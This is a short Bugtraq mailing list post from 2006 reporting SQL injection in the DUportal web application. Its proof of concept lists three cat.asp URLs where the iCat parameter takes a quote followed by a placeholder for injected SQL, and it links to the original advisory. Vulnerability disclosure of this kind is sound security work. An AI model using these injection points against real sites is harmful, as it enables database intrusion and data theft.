Bugtraq mailing list archives

SQL Injection On DUportal


From: outlaw () aria-security net
Date: 26 Apr 2006 05:11:38 -0000

Proof of Concept:
/News/cat.asp?iCat=' [SQL INJECTION]&iChannel=1&nChannel=News
/Articles/cat.asp?iCat=' [SQL INJECTION]&iChannel=2&nChannel=Articles
/Pictures/cat.asp?iCat=' [SQL INJECTION]&iChannel=3&nChannel=Pictures 


Original advisory:http://www.aria-security.net/advisory/duportal.txt 


Current thread: